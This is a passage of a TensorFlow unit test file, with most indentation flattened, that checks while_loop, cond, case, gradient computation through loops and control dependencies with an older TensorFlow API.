m = tf.convert_to_tensor(0)
c = tf.convert_to_tensor(0)
o = tf.convert_to_tensor(0)
x = tf.convert_to_tensor([1, 2, 3, 4, 5, 6])
s = tf.size(x)
r = tf.while_loop(
lambda i, m, c, o: tf.less(i, s), compute, [i, m, c, o])
result = r[3].eval()
self.assertTrue(check_op_order(i.graph))
self.assertAllEqual(42, result)
def testWhile_5(self):
with self.test_session():
def compute(i, c, o):
c = tf.slice(x, tf.expand_dims(i, 0), [1])
o = tf.concat(0, [o, c])
i = tf.add(i, 1)
return [i, c, o]
i = tf.convert_to_tensor(0)
c = tf.convert_to_tensor(0)
o = tf.convert_to_tensor([0])
x = tf.convert_to_tensor([1, 2, 3, 4, 5, 6])
s = tf.size(x)
r = tf.while_loop(
lambda i, c, o: tf.less(i, s), compute, [i, c, o])
result = r[2].eval()
self.assertTrue(check_op_order(i.graph))
self.assertAllEqual(np.array([0, 1, 2, 3, 4, 5, 6]), result)
def _testWhile_Gpu_1(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
n = tf.constant(1.0)
c = lambda x: tf.less(x, 10.0)
b = lambda x: tf.add(x, 1.0)
r = tf.while_loop(c, b, [n])
self.assertAllClose(10.0, r.eval())
def testWhile_Gpu_1(self):
self._testWhile_Gpu_1(use_gpu=False)
self._testWhile_Gpu_1(use_gpu=True)
def _testWhile_Gpu_2(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
n = tf.constant(1.0)
c = lambda x: tf.less(x, 10.0)
def b(x):
with tf.device("/cpu:0"):
return tf.add(x, 1.0)
r = tf.while_loop(c, b, [n])
self.assertAllClose(10.0, r.eval())
def testWhile_Gpu_2(self):
    self._testWhile_Gpu_2(use_gpu=False)
    self._testWhile_Gpu_2(use_gpu=True)
def testWhileShape(self):
with self.test_session():
i = tf.constant(0)
m = tf.ones([2, 2])
c = lambda i, j: tf.less(i, 2)
def _b(i, j):
new_i = tf.add(i, 1)
new_j = tf.tile(j, [2, 2])
return [new_i, new_j]
r = tf.while_loop(c, _b, [i, m])
r = r[1] * tf.ones([8, 8])
self.assertAllEqual(np.ones((8, 8)), r.eval())
def testWhileShapeInference(self):
with self.test_session():
i = tf.constant(0)
m = tf.ones([2, 2])
c = lambda i, j: tf.less(i, 2)
def _b(i, j):
new_i = tf.add(i, 1)
new_j = tf.concat(0, [j, j])
return [new_i, new_j]
r = tf.while_loop(c, _b, [i, m])
self.assertTrue(r[1].get_shape()[0].value is None)
self.assertEqual(r[1].get_shape()[1], tf.Dimension(2))
def _testNestedWhile_1(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
n = tf.constant(0)
def cpu_sum(s):
c = lambda i, s: tf.less(i, 10)
def b(i, s):
i1 = tf.add(i, 1)
with tf.device("/cpu:0"):
s1 = tf.add(i, s)
return i1, s1
_, r_s = tf.while_loop(c, b, [n, s])
return r_s
c = lambda x: tf.less(x, 200)
b = lambda x: tf.add(x, cpu_sum(n))
r = tf.while_loop(c, b, [n])
self.assertEqual(225, r.eval())
def testNestedWhile_1(self):
self._testNestedWhile_1(use_gpu=False)
self._testNestedWhile_1(use_gpu=True)
def testWhileWithControl_1(self):
with self.test_session():
n = tf.constant(0)
r = tf.constant(0)
condition = lambda n_, r_: tf.less(n_, 10)
def body(n_, r_):
n_ = tf.add(n_, 1)
with r_.graph.control_dependencies([r_]):
r_ = tf.constant(12)
return [n_, r_]
res = tf.while_loop(condition, body, [n, r],
parallel_iterations=1)
self.assertAllEqual(12, res[1].eval())
def testWhileWithControl_2(self):
with self.test_session():
r = tf.constant(0)
condition = lambda r_: tf.less(r_, 10)
def body(r_):
with r_.graph.control_dependencies([r_]):
r_ = tf.constant(12)
return [r_]
res = tf.while_loop(condition, body, [r], parallel_iterations=1)
self.assertAllEqual(12, res.eval())
def testWhileWithControl_3(self):
with self.test_session() as sess:
b = tf.placeholder(tf.bool)
c = tf.constant(0)
with tf.control_dependencies([b]):
c = tf.while_loop(lambda x: x < 10, lambda x: x + 1, [c])
self.assertEqual(10, sess.run(c, {b: True}))
def testCondWhile_1(self):
with self.test_session():
n = tf.convert_to_tensor(0, name="n")
c = lambda x: tf.less(x, 10)
b = lambda x: tf.add(x, 1)
r = tf.cond(tf.less(0, 1),
lambda: tf.while_loop(c, b, [n]),
lambda: n)
self.assertAllEqual(10, r.eval())
def testCondWhile_2(self):
with self.test_session():
n = tf.convert_to_tensor(0)
c = lambda x: tf.less(x, 10)
b = lambda x: tf.add(x, 1)
r = tf.cond(tf.less(1, 0), lambda: tf.add(n, 1),
lambda: tf.while_loop(c, b, [n]))
self.assertAllEqual(10, r.eval())
def testWhileCond_1(self):
with self.test_session():
i = tf.convert_to_tensor(0, name="i")
n = tf.convert_to_tensor(10, name="n")
one = tf.convert_to_tensor(1, name="one")
c = lambda x: tf.less(x, n)
# pylint: disable=undefined-variable
# for OSS build
b = lambda x: tf.cond(
tf.constant(True), lambda: tf.add(x, one), lambda: tf.sub(x, one))
# pylint: enable=undefined-variable
r = tf.while_loop(c, b, [i])
self.assertAllEqual(10, r.eval())
def testWhileCond_2(self):
with self.test_session():
n = tf.convert_to_tensor(0, name="n")
c = lambda x: tf.less(x, 10)
b = lambda x: tf.cond(tf.constant(True), lambda: tf.add(x, 1), lambda: n)
r = tf.while_loop(c, b, [n])
self.assertAllEqual(10, r.eval())
def testWhileCond_3(self):
with self.test_session():
n = tf.convert_to_tensor(0)
c = lambda x: tf.less(x, 10)
# pylint: disable=undefined-variable
# for OSS build
b = lambda x: tf.cond(tf.less(0, 1), lambda: tf.add(x, 1),
lambda: tf.sub(x, 1))
# pylint: enable=undefined-variable
r = tf.while_loop(c, b, [n])
self.assertAllEqual(10, r.eval())
# NOTE: It is ok to have parallel_iterations > 1
def testWhileUpdateVariable_1(self):
with self.test_session():
select = tf.Variable([3.0, 4.0, 5.0])
n = tf.constant(0)
def loop_iterator(j):
return tf.less(j, 3)
def loop_body(j):
ns = tf.scatter_update(select, j, 10.0)
nj = tf.add(j, 1)
op = control_flow_ops.group(ns)
nj = control_flow_ops.with_dependencies([op], nj)
return [nj]
r = tf.while_loop(loop_iterator, loop_body, [n],
parallel_iterations=1)
self.assertTrue(check_op_order(n.graph))
tf.initialize_all_variables().run()
self.assertEqual(3, r.eval())
result = select.eval()
self.assertAllClose(np.array([10.0, 10.0, 10.0]), result)
def testWhileUpdateVariable_2(self):
with self.test_session():
select1 = tf.Variable([3.0, 4.0, 5.0])
select2 = tf.Variable([3.0, 4.0, 5.0])
n = tf.constant(0)
def loop_iterator(j):
return tf.less(j, 3)
def loop_body(j):
ns1 = tf.scatter_update(select1, j, 10.0)
ns2 = tf.scatter_update(select2, j, 10.0)
nj = tf.add(j, 1)
op = control_flow_ops.group(ns1, ns2)
nj = control_flow_ops.with_dependencies([op], nj)
return [nj]
r = tf.while_loop(loop_iterator, loop_body, [n],
parallel_iterations=1)
self.assertTrue(check_op_order(n.graph))
tf.initialize_all_variables().run()
self.assertEqual(3, r.eval())
result1 = select1.eval()
self.assertAllClose(np.array([10.0, 10.0, 10.0]), result1)
result2 = select2.eval()
self.assertAllClose(np.array([10.0, 10.0, 10.0]), result2)
def testWhileUpdateVariable_3(self):
with self.test_session():
select = tf.Variable([3.0, 4.0, 5.0])
n = tf.constant(0)
def loop_iterator(j, _):
return tf.less(j, 3)
def loop_body(j, _):
ns = tf.scatter_update(select, j, 10.0)
nj = tf.add(j, 1)
return [nj, ns]
r = tf.while_loop(loop_iterator, loop_body,
[n, tf.identity(select)],
parallel_iterations=1)
tf.initialize_all_variables().run()
result = r[1].eval()
self.assertTrue(check_op_order(n.graph))
self.assertAllClose(np.array([10.0, 10.0, 10.0]), result)
# b/24814703
def testWhileUpdateVariable_4(self):
with self.test_session():
var_a = tf.Variable(0, name="a")
var_b = tf.Variable(0, name="b")
tf.initialize_all_variables().run()
c = tf.constant(0, name="c")
asn1 = tf.assign_add(var_a, 1, name="a_add")
# Loop condition
def pred(i):
return tf.less(i, 10)
# Loop body
def loop_body(i):
asn2 = tf.assign_add(var_b, asn1, name="b_add")
with tf.control_dependencies([asn2]):
ni = tf.add(i, 1, name="i_add")
return ni
lpa = tf.while_loop(pred, loop_body, [c],
parallel_iterations=1)
self.assertEqual(0, var_b.eval())
lpa.eval() # Run the loop
self.assertEqual(10, var_b.eval())
# b/24736492
def testWhileUpdateVariable_5(self):
with self.test_session():
# Create some variables.
var_a = tf.Variable(0, name="a")
var_b = tf.Variable(0, name="b")
tf.initialize_all_variables().run()
# Change condition to check var_b
def pred(_):
return tf.less(var_b, 10)
# Change body to increment var_b
def loop_body(i):
asn1 = tf.assign_add(var_a, tf.constant(1), name="a_add")
asn2 = tf.assign_add(var_b, tf.constant(1), name="b_add")
with tf.control_dependencies([asn1, asn2]):
inc_b = tf.identity(var_b)
return inc_b
lpa = tf.while_loop(pred, loop_body, [var_b], 1, name="loop")
self.assertEqual(0, var_b.eval())
lpa.eval() # Run the loop
self.assertEqual(10, var_a.eval())
self.assertEqual(10, var_b.eval())
# b/24814668
def testWhileUpdateVariable_6(self):
with self.test_session():
# Create some variables.
var_a = tf.Variable(0, name="a")
var_b = tf.Variable(0, name="b")
c = tf.constant(0)
tf.initialize_all_variables().run()
# Loop condition
def pred(i):
return tf.less(i, 10)
# Loop body
def loop_body(i):
asn1 = tf.assign_add(var_a, 1, name="a_add")
with tf.control_dependencies([asn1]):
asn2 = tf.assign_add(var_b, var_a, name="b_add")
with tf.control_dependencies([asn2]):
ni = tf.add(i, 1, name="i_add")
return ni
lpa = tf.while_loop(pred, loop_body, [c], 1, name="loop")
self.assertEqual(0, var_b.eval())
lpa.eval() # Run the loop
self.assertEqual(55, var_b.eval())
self.assertEqual(10, var_a.eval())
def testWhileQueue_1(self):
with self.test_session():
q = tf.FIFOQueue(-1, tf.int32)
i = tf.constant(0)
def c(i):
return tf.less(i, 10)
def b(i):
ni = tf.add(i, 1)
ni = control_flow_ops.with_dependencies([q.enqueue((i,))], ni)
return ni
r = tf.while_loop(c, b, [i], parallel_iterations=1)
self.assertEqual([10], r.eval())
for i in xrange(10):
self.assertEqual([i], q.dequeue().eval())
def testWhileStack_1(self):
with self.test_session():
s = gen_data_flow_ops._stack(tf.int32, stack_name="foo")
i = tf.constant(0)
def c(i):
return tf.less(i, 10)
def b(i):
ni = tf.add(i, 1)
ni = control_flow_ops.with_dependencies(
[gen_data_flow_ops._stack_push(s, i)], ni)
return ni
r = tf.while_loop(c, b, [i], parallel_iterations=1)
x = tf.constant(0)
def c1(i, _):
return tf.greater(i, 0)
def b1(i, x):
ni = tf.sub(i, 1)
nx = x + gen_data_flow_ops._stack_pop(s, tf.int32)
return [ni, nx]
_, rx = tf.while_loop(c1, b1, [r, x], parallel_iterations=1)
self.assertEqual(45, rx.eval())
def testWhileGrad_Square(self):
with self.test_session():
v = tf.constant(2.0, name="v")
c = lambda v: tf.less(v, 100.0)
b = tf.square
r = tf.while_loop(c, b, [v], parallel_iterations=1)
r = control_flow_ops.cond(tf.less(1, 2), lambda: r, lambda: v)
r = tf.gradients(r, v)[0]
self.assertAllClose(1024.0, r.eval())
def testWhileGrad_Shape(self):
with self.test_session():
x = tf.placeholder(tf.float32, shape=[None])
v = tf.constant([2.0], name="v")
n = tf.constant(0, name="n")
c = lambda i, v: tf.less(i, 5)
b = lambda i, v: [i + 1, tf.mul(x, v)]
r = tf.while_loop(c, b, [n, v], parallel_iterations=1)
r = tf.gradients(r[1], x)[0]
self.assertEqual([None], r.get_shape().as_list())
self.assertAllClose([810.0, 2560.0], r.eval(feed_dict={x: [3.0, 4.0]}))
def testWhileGrad_MultipleUses(self):
with self.test_session():
v = tf.constant(2.0, name="v")
c = lambda v: tf.less(v, 100.0)
b = tf.square
r = tf.while_loop(c, b, [v], parallel_iterations=1)
r = tf.mul(r, r)
r = tf.gradients(r, v)[0]
self.assertEqual(524288.0, r.eval())
def testWhileGrad_LoopAdd(self):
with self.test_session():
v = tf.constant(2.0, name="v")
c = lambda v: tf.less(v, 100.0)
b = tf.square
r = tf.while_loop(c, b, [v], parallel_iterations=1)
r = tf.add(r, r)
r = tf.gradients(r, v)[0]
self.assertAllClose(2048.0, r.eval())
def _testWhileGrad_Mul(self, use_gpu, p_iters):
with self.test_session(use_gpu=use_gpu) as sess:
a = tf.constant(3.0, name="a")
v = tf.constant(2.0, name="v")
c = lambda v: tf.less(v, 100.0)
b = lambda v: tf.mul(v, a)
r = tf.while_loop(c, b, [v], parallel_iterations=p_iters)
grad_a, grad_v = tf.gradients(r, [a, v])
grad_a_val, grad_v_val = sess.run([grad_a, grad_v])
self.assertAllClose(216.0, grad_a_val)
self.assertAllClose(81.0, grad_v_val)
def testWhileGrad_Mul(self):
self._testWhileGrad_Mul(use_gpu=False, p_iters=1)
self._testWhileGrad_Mul(use_gpu=False, p_iters=10)
self._testWhileGrad_Mul(use_gpu=True, p_iters=1)
self._testWhileGrad_Mul(use_gpu=True, p_iters=10)
def testWhileGrad_Variable(self):
with self.test_session():
a = tf.Variable(3.0)
v = tf.constant(2.0, name="v")
c = lambda v: tf.less(v, 100.0)
b = lambda v: tf.mul(v, a)
r = tf.while_loop(c, b, [v], parallel_iterations=1)
r = tf.gradients(r, a)
tf.initialize_all_variables().run()
self.assertAllClose(216.0, r[0].eval())
def testWhileGrad_ys_xs(self):
with self.test_session():
x = tf.constant(3.0, name="x")
y = tf.constant(2.0, name="y")
c = lambda x, y: tf.less(x, 100.0)
def b(x, y):
y1 = tf.add(x, y)
x1 = tf.mul(x, y1)
return x1, y1
rx, ry = tf.while_loop(c, b, [x, y], parallel_iterations=1)
r = tf.gradients([rx, ry], x)
self.assertAllClose(304.0, r[0].eval())
r = tf.gradients([rx, ry], y)
self.assertAllClose(124.0, r[0].eval())
r = tf.gradients([rx], x)
self.assertAllClose(295.0, r[0].eval())
r = tf.gradients([rx], y)
self.assertAllClose(120.0, r[0].eval())
def testWhileGrad_Dependency(self):
with self.test_session():
i = tf.constant(0, name="i")
x = tf.constant(2.0, name="x")
c = lambda i, x: tf.less(i, 10)
def b(i, x):
x = tf.mul(x, 2.0)
i = tf.add(i, 1)
return i, x
ri, rx = tf.while_loop(c, b, [i, x], parallel_iterations=1)
r = tf.gradients([ri, rx], x)
self.assertAllClose(1024.0, r[0].eval())
r = tf.gradients([rx], x)
self.assertAllClose(1024.0, r[0].eval())
def testWhileGrad_NoGradient(self):
with self.test_session():
v = tf.constant(2.0, name="v")
c = lambda v: tf.less(v, 100.0)
b = tf.square
r = tf.while_loop(c, b, [v], back_prop=False)
r = tf.add(r, v)
r = tf.gradients(r, v)
self.assertAllClose(1.0, r[0].eval())
def testWhileGrad_NoDependency(self):
with self.test_session() as sess:
variable = tf.Variable(tf.ones([2, 3]))
time = tf.zeros([], dtype=tf.int32)
def cond(time, tensor, _):
return time < 10
def body(time, tensor, _):
return (time+1, tensor, tensor)
loop_vars = [time, variable, variable]
tensors = tf.while_loop(cond=cond, body=body, loop_vars=loop_vars)
cost = tf.reduce_sum(tensors[2])
grad = tf.gradients(cost, [variable])
tf.initialize_all_variables().run()
self.assertAllClose(np.ones([2, 3]), sess.run(grad[0]))
def testWhileGrad_Const(self):
with self.test_session() as sess:
c0 = tf.constant(0.0, name="c0")
c1 = tf.constant(1.0, name="c1")
time = tf.constant(0, name="t")
def cond(time, _):
return time < 1
def body(time, tensor):
return time+1, c1
loop_vars = [time, c0]
tensors = tf.while_loop(cond=cond, body=body, loop_vars=loop_vars)
cost = tf.reduce_sum(tensors[1])
grad = tf.gradients(cost, [c0])
self.assertAllClose(0.0, sess.run(grad[0]))
def testWhileGrad_SerialTwoLoops(self):
with self.test_session():
i = tf.constant(0, name="i")
x = tf.constant(2.0, name="x")
c = lambda i, x: tf.less(i, 5)
def b(i, x):
x = tf.mul(x, 2.0)
i = tf.add(i, 1)
return i, x
_, rx = tf.while_loop(c, b, [i, x], parallel_iterations=1)
_, rx = tf.while_loop(c, b, [i, rx], parallel_iterations=1)
r = tf.gradients([rx], x)
self.assertAllClose(1024.0, r[0].eval())
def testWhileGrad_ParallelTwoLoops(self):
with self.test_session():
i = tf.constant(0, name="i")
x = tf.constant(2.0, name="x")
c = lambda i, x: tf.less(i, 5)
def b(i, x):
x = tf.mul(x, 2.0)
i = tf.add(i, 1)
return i, x
_, r1 = tf.while_loop(c, b, [i, x], parallel_iterations=1)
_, r2 = tf.while_loop(c, b, [i, x], parallel_iterations=1)
rx = tf.add(r1, r2)
r = tf.gradients([rx], x)
self.assertAllClose(64.0, r[0].eval())
def _testNestedWhileGrad_Simple(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
v = tf.constant(1.0)
def inner_loop(s):
c = lambda x: tf.less(x, 4.0)
b = lambda x: tf.mul(x, 2.0)
return tf.while_loop(c, b, [s])
c = lambda x: tf.less(x, 2.0)
b = lambda x: tf.mul(inner_loop(x), 2.0)
r = tf.while_loop(c, b, [v])
r = tf.gradients(r, v)[0]
self.assertAllClose(8.0, r.eval())
def testNestedWhileGrad_Simple(self):
self._testNestedWhileGrad_Simple(use_gpu=False)
self._testNestedWhileGrad_Simple(use_gpu=True)
def testNestedWhileGrad_SerialInner(self):
with self.test_session():
v = tf.constant(1.0)
def inner_loop1(s):
z = tf.constant(0)
c = lambda i, x: tf.less(i, 4)
b = lambda i, x: [tf.add(i, 1), tf.mul(x, 2.0)]
return tf.while_loop(c, b, [z, s])
def inner_loop2(s):
z = tf.constant(0)
c = lambda i, x: tf.less(i, 4)
b = lambda i, x: [tf.add(i, 1), tf.mul(x, 2.0)]
return tf.while_loop(c, b, [z, s])
c = lambda x: tf.less(x, 128.0)
b = lambda x: inner_loop2(inner_loop1(x)[1])[1]
r = tf.while_loop(c, b, [v])
r = tf.gradients(r, v)[0]
self.assertAllClose(256.0, r.eval())
def testNestedWhileGrad_ParallelInner(self):
with self.test_session():
v = tf.constant(1.0)
def inner_loop1(s):
z = tf.constant(0)
c = lambda i, x: tf.less(i, 4)
b = lambda i, x: [tf.add(i, 1), tf.mul(x, 2.0)]
return tf.while_loop(c, b, [z, s])
def inner_loop2(s):
z = tf.constant(0)
c = lambda i, x: tf.less(i, 4)
b = lambda i, x: [tf.add(i, 1), tf.mul(x, 2.0)]
return tf.while_loop(c, b, [z, s])
c = lambda x: tf.less(x, 128.0)
b = lambda x: tf.mul(inner_loop1(x)[1], inner_loop2(x)[1])
r = tf.while_loop(c, b, [v])
r = tf.gradients(r, v)[0]
self.assertAllClose(512.0, r.eval())
def _testWhileCondGrad_Simple(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
v = tf.convert_to_tensor(2.0, name="v")
n = tf.convert_to_tensor(100.0, name="n")
one = tf.convert_to_tensor(1.0, name="one")
c = lambda x: tf.less(x, n)
# pylint: disable=undefined-variable
# for OSS build
b = lambda x: control_flow_ops.cond(tf.constant(True),
lambda: tf.square(x),
lambda: tf.sub(x, one))
# pylint: enable=undefined-variable
r = tf.while_loop(c, b, [v])
r = tf.gradients(r, v)[0]
self.assertAllClose(1024.0, r.eval())
def testWhileCondGrad_Simple(self):
self._testWhileCondGrad_Simple(use_gpu=False)
self._testWhileCondGrad_Simple(use_gpu=True)
def testWhileCondGrad_UnknownShape(self):
with self.test_session() as sess:
v = tf.placeholder(tf.float32)
n = tf.convert_to_tensor(100.0, name="n")
one = tf.convert_to_tensor(1.0, name="one")
c = lambda x: tf.less(x, n)
# pylint: disable=undefined-variable
# for OSS build
b = lambda x: control_flow_ops.cond(tf.constant(True),
lambda: tf.square(x),
lambda: tf.sub(x, one))
# pylint: enable=undefined-variable
r = tf.while_loop(c, b, [v])
r = tf.gradients(r, v)[0]
r = sess.run(r, feed_dict={v: 2.0})
self.assertAllClose(1024.0, r)
def testWhileWithRefsWithGradients_1(self):
with self.test_session() as sess:
x = tf.Variable(0).ref()
i = tf.constant(0)
c = lambda i, x: tf.less(i, 10)
self.assertEqual(x.dtype, tf.int32_ref)
# pylint: disable=protected-access
def body(i, x):
self.assertEqual(x.dtype, tf.int32_ref)
return (i+1, gen_array_ops._ref_identity(x))
# pylint: enable=protected-access
r = tf.while_loop(c, body, [i, x], parallel_iterations=5)
grad_ys = [tf.Variable(73).ref()]
grad = tf.gradients([r[1]], [x], grad_ys=grad_ys)
tf.initialize_all_variables().run()
self.assertEqual(r[0].dtype, tf.int32)
self.assertEqual(r[1].dtype, tf.int32_ref)
value_i, value_x, value_x_grad = sess.run(r + grad)
self.assertEqual(10, value_i)
self.assertEqual(0, value_x)
self.assertEqual(73, value_x_grad)
def testWhileGrad_IndexedSlices(self):
with self.test_session():
values = tf.constant([2.0, 4.0], name="values")
indices = tf.constant([0, 3], name="indices")
shape = tf.constant([10], name="dense_shape")
i = tf.constant(0)
x = tf.IndexedSlices(values, indices, dense_shape=shape)
def c(i, _):
return i < 10
def b(i, x):
return [i + 1, tf.IndexedSlices(x.values * 2.0, x.indices,
x.dense_shape)]
_, r = tf.while_loop(c, b, [i, x])
r = tf.gradients(r.values, values)[0]
self.assertAllClose(np.array([1024.0, 1024.0]), r.eval())
def testWhileGrad_SparseTensor(self):
with self.test_session():
values = tf.constant([2.0, 4.0], name="values")
indices = tf.constant([[0], [3]], dtype=tf.int64, name="indices")
shape = tf.constant([10], dtype=tf.int64, name="dense_shape")
i = tf.constant(0)
x = tf.SparseTensor(indices, values, shape=shape)
def c(i, _):
return i < 10
def b(i, x):
return [i + 1, tf.SparseTensor(x.indices, x.values * 2.0,
x.shape)]
_, r = tf.while_loop(c, b, [i, x])
r = tf.gradients(r.values, values)[0]
self.assertAllClose(np.array([1024.0, 1024.0]), r.eval())
def testCallGradInLoop(self):
with self.test_session() as sess:
i0 = tf.constant(0)
params = tf.constant(5.0)
params_1 = tf.square(params)
def c(i, _):
return i < 10
def b(i, x):
data = tf.constant([1.0, 2.0, 3.0])
data = tf.mul(data, params_1)
x1 = x + tf.gradients(data, params)[0]
return i + 1, x1
output_grad = tf.while_loop(c, b, [i0, tf.constant(0.0)])
self.assertAllClose(600.0, sess.run(output_grad)[1])
def testWhileGradGrad(self):
theta = tf.Variable(initial_value=1.)
def fn(x, prev):
return prev + x * theta
result = tf.scan(fn, [1., 2., 3.])
grad_theta = tf.gradients(result, theta)
with self.assertRaisesRegexp(TypeError, "Second-order gradient"):
tf.gradients(grad_theta, theta)
def testOneValueCond(self):
with self.test_session():
c = tf.placeholder(tf.int32, shape=[])
one = tf.convert_to_tensor(1, name="one")
two = tf.convert_to_tensor(2, name="two")
p = tf.greater_equal(c, 1)
i = tf.cond(p, lambda: one, lambda: two)
self.assertTrue(isinstance(i, tf.Tensor))
# True case: c = 2 is >= 1
self.assertEqual([1], i.eval(feed_dict={c: 2}))
# False case: c = 0 is not >= 1
self.assertEqual([2], i.eval(feed_dict={c: 0}))
def testExampleCond(self):
with self.test_session():
x = tf.convert_to_tensor([-2.0, 2.0], name="x")
d = tf.placeholder(tf.int32, shape=[])
def l2():
return tf.sqrt(tf.reduce_sum(tf.square(x)))
def l1():
return tf.reduce_sum(tf.abs(x))
i = tf.cond(tf.equal(d, 2), l2, l1)
self.assertAllClose(4.0, i.eval(feed_dict={d: 1}))
self.assertAllClose(2.0 * math.sqrt(2), i.eval(feed_dict={d: 2}))
def testCase(self):
with self.test_session():
x = tf.constant(1)
y = tf.constant(2)
z = tf.constant(3)
f1 = lambda: tf.constant(17)
f2 = lambda: tf.constant(23)
f3 = lambda: tf.constant(-1)
r1 = tf.case({x < y: f1, x > z: f2}, default=f3, exclusive=True)
self.assertAllEqual(r1.eval(), 17)
r2 = tf.case([(y > z, f1), (y > x, f2)], default=f3)
self.assertAllEqual(r2.eval(), 23)
# Duplicate events can happen, first one is selected
r3 = tf.case([(x < y, f1), (x < y, f2)], default=f3)
self.assertAllEqual(r3.eval(), 17)
# Duplicate events cause an error if exclusive = True
r4 = tf.case([(x < y, f1), (x < y, f2)], default=f3, exclusive=True)
with self.assertRaisesOpError(
"More than one condition evaluated as True but exclusive=True."):
r4.eval()
# Check that the default is called if none of the others are
r5 = tf.case({x > y: f1}, default=f3)
self.assertAllEqual(r5.eval(), -1)
ran_once = [False, False, False]
def break_run_twice(ix):
def _break():
ran_once[ix] = True
return tf.constant(ix)
return _break
# Should not fail - each conditional gets called exactly once
# except default. Default gets called twice: once to create an
# empty output and once for the actual cond switch.
r6 = tf.case([(x < y, break_run_twice(0)), (x > y, break_run_twice(1))],
default=lambda: tf.constant(2))
self.assertAllEqual(r6.eval(), 0)
def testCaseSideEffects(self):
with self.test_session() as sess:
v0 = tf.Variable(-1)
v1 = tf.Variable(-1)
v2 = tf.Variable(-1)
a = lambda: control_flow_ops.with_dependencies([tf.assign(v0, 0)], 0)
b = lambda: control_flow_ops.with_dependencies([tf.assign(v1, 1)], 1)
c = lambda: control_flow_ops.with_dependencies([tf.assign(v2, 2)], 2)
x = tf.constant(1)
y = tf.constant(2)
r0 = tf.case(((x < y, a), (x > y, b)), default=c, exclusive=True)
r1 = tf.case(((x > y, a), (x < y, b)), default=c, exclusive=True)
r2 = tf.case(((x > y, a), (x > y, b)), default=c, exclusive=True)
tf.initialize_all_variables().run()
self.assertAllEqual(sess.run([v0, v1, v2]), [-1] * 3)
self.assertEqual(2, r2.eval())
self.assertAllEqual(sess.run([v0, v1, v2]), [-1, -1, 2])
tf.initialize_all_variables().run()
self.assertAllEqual(sess.run([v0, v1, v2]), [-1] * 3)
self.assertEqual(1, r1.eval())
self.assertAllEqual(sess.run([v0, v1, v2]), [-1, 1, -1])
tf.initialize_all_variables().run()
self.assertAllEqual(sess.run([v0, v1, v2]), [-1] * 3)
self.assertEqual(0, r0.eval())
self.assertAllEqual(sess.run([v0, v1, v2]), [0, -1, -1])
def testOneOpCond(self):
with self.test_session():
v = tf.Variable(0)
c = tf.convert_to_tensor(0)
one = tf.convert_to_tensor(1)
two = tf.convert_to_tensor(2)
p = tf.greater_equal(c, 1)
def a():
return tf.assign(v, one)
def b():
return tf.assign(v, two)
i = tf.cond(p, a, b)
self.assertTrue(isinstance(i, tf.Tensor))
tf.initialize_all_variables().run()
self.assertEqual(0, v.eval())
# True case: c = 2 is >= 1, v is set to 1.
self.assertEqual(1, i.eval(feed_dict={c.name: 2}))
self.assertEqual(1, v.eval())
# False case: c = 0 is not >= 1, v is set to 2.
self.assertEqual(2, i.eval(feed_dict={c.name: 0}))
self.assertEqual(2, v.eval())
def testWithOpsDependencies(self):
with self.test_session() as sess:
v = tf.Variable(0.0)
c = tf.constant(10)
# Fetching v directly will result in an uninitialized error
with self.assertRaisesOpError("Attempting to use uninitialized value"):
sess.run([c, v])
# Use a control dependency to ensure init_variable is run
# while asking for c
real_v = control_flow_ops.with_dependencies(
name="real_tensor",
output_tensor=v.ref(),
dependencies=[v.initializer])
c_val, real_v_val = sess.run([c, real_v])
# Ensure the result of 'real_c' is the same as 'c'
self.assertAllEqual(10, c_val)
# Ensure that 'v' is initialized
self.assertAllClose(0.0, real_v_val)
def testWithTensorDependencies(self):
with self.test_session():
v = tf.Variable(0.0)
c1 = tf.constant(10)
c2 = tf.constant(20)
# c1_with_init_v depends on the init op for v
c1_with_init_v = control_flow_ops.with_dependencies(
name="c1_with_init_v",
output_tensor=c1,
dependencies=[v.initializer])
# c2_with_c1 depends on the value of c1_with_init_v
c2_with_c1_dep = control_flow_ops.with_dependencies(
name="c2_with_c1_dep",
output_tensor=c2,
dependencies=[c1_with_init_v])
# Fetching v directly will result in an uninitialized error
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v.eval()
# Get the value of 'c2_with_c1_dep', which should cause 'v'
# to be initialized.
self.assertAllEqual(20, c2_with_c1_dep.eval())
# Ensure that 'v' is initialized
self.assertAllClose(0.0, v.eval())
def testWithIndexedSlicesDependencies(self):
with self.test_session():
v = tf.Variable(
np.array([[0.0, 1.0], [10.0, 11.0], [20.0, 21.0]]).astype(np.float32))
v_at_1 = tf.IndexedSlices(v, tf.constant([1]))
gather_v_at_1 = tf.gather(v_at_1.values, v_at_1.indices)
v_at_1_after_init = control_flow_ops.with_dependencies([v.initializer],
v_at_1)
gather_v_at_1_after_init = tf.gather(
v_at_1_after_init.values, v_at_1_after_init.indices)
# Fetching gather_v_at_1 will result in an uninitialized error
with self.assertRaisesOpError("Attempting to use uninitialized value"):
gather_v_at_1.eval()
# Getting gather_v_at_1_after_init will work, and initialize v.
self.assertAllEqual([[10.0, 11.0]], gather_v_at_1_after_init.eval())
# Double check that 'v' is initialized
self.assertAllClose([[0.0, 1.0], [10.0, 11.0], [20.0, 21.0]], v.eval())
def testDependenciesDevice(self):
with tf.Graph().as_default():
# device set on tensor => same device on dep.
with tf.device("/job:ps"):
vd = tf.Variable([0.0])
with_vd_dep = control_flow_ops.with_dependencies([vd.initializer], vd)
self.assertTrue("/job:ps" in with_vd_dep.device)
# No device set on tensor => no device on dep.
vnod = tf.Variable([0.0])
with_vnod_dep = control_flow_ops.with_dependencies([vnod.initializer],
vnod)
self.assertDeviceEqual(None, with_vnod_dep.device)
# device set on tensor, default device on graph => default device on dep.
vdef = tf.Variable([0.0], name="vdef")
with tf.device("/job:worker/gpu:1"):
with_vdef_dep = control_flow_ops.with_dependencies([vdef.initializer],
vdef)
# The device is empty, but the colocation constraint is set.
self.assertDeviceEqual("", with_vdef_dep.device)
self.assertEqual([b"loc:@vdef"],
with_vdef_dep.op.colocation_groups())
def testGroup(self):
with self.test_session() as sess:
v1 = tf.Variable([0.0])
v2 = tf.Variable([1.0])
# Group init1 and init2 and run.
init = control_flow_ops.group(v1.initializer, v2.initializer)
# Fetching v1 directly will result in an uninitialized error
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v1.eval()
# Runs "init" before fetching v1 and v2.
init.run()
v1_val, v2_val = sess.run([v1, v2])
